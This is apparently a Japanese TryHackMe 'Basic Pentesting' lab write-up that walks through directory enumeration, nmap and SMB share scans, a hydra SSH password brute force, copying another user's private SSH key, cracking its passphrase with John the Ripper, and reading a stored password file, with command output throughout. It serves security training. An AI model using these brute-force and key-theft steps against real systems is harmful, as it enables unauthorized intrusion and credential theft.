[TryHackMe] BasicPentesting-writeup

gobuster

隠しディレクトリを見つけます。
どうせhttp(80)が空いてるのでgobusterで見つけます

┌─[user@parrot]─[~]
└──╼ $sudo gobuster dir -u http://10.10.68.199 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.68.199
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 296]
/.hta                 (Status: 403) [Size: 291]
/.htpasswd            (Status: 403) [Size: 296]
/development          (Status: 301) [Size: 318] [--> http://10.10.68.199/development/]
/index.html           (Status: 200) [Size: 158]
/server-status        (Status: 403) [Size: 300]

ありました

• deveropment

namp

reconを飛ばして空いているポートを見つけます。

┌─[user@parrot]─[~]
└──╼ $nmap -sV -T4 10.10.68.199
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-19 02:12 UTC
Nmap scan report for 10.10.68.199
Host is up (0.33s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp   open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
1090/tcp  filtered ff-fms
8009/tcp  open     ajp13?
8080/tcp  open     http-proxy
33354/tcp filtered unknown
44176/tcp filtered unknown
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

smbサーバーが気になります。。。。。

┌─[user@parrot]─[~]
└──╼ $nmap --script smb-enum-shares.nse -p445 10.10.68.199
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-19 02:27 UTC
Nmap scan report for 10.10.68.199
Host is up (0.35s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.68.199\Anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\anonymous
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.68.199\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

What is the name of the hidden directory on the web server(enter name without /)?

• anonymous

を見つけたので接続します

staff.txtが怪しいのでgetして中身を見てみます。
JanとKayというユーザを見つけました。
パスワードはわからないので hydraでブルートフォースします

┌─[✗]─[user@parrot]─[~]
└──╼ $sudo hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.68.199 ssh
[22][ssh] host: 10.10.68.199   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found

• armando

What service do you use to access the server(answer in abbreviation in all caps)?

• SSH

If you have found another user, what can you do with this information?

• kay

jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo

drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
.ssh内のid_rsaをscpでparrot側に送ります.

ssh -i id_rsa kay@10.10.xx.xx

ここでパスフレーズを聞かれたので

johnでクラックします

ssh2john id_rsa > text.txt

john text.txt --wordlist==/usr/share/wordlists/rockyou.txt

beeswax
sshでログインします
pass.bakが怪しいのでみます

kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

• heresareallystrongpasswordthatfollowsthepasswordpolicy$$